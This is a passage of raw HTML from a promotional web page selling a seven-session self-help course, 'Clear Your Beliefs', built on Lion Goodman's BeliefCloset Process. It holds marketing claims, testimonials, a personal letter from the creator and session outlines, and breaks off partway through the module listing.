System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div 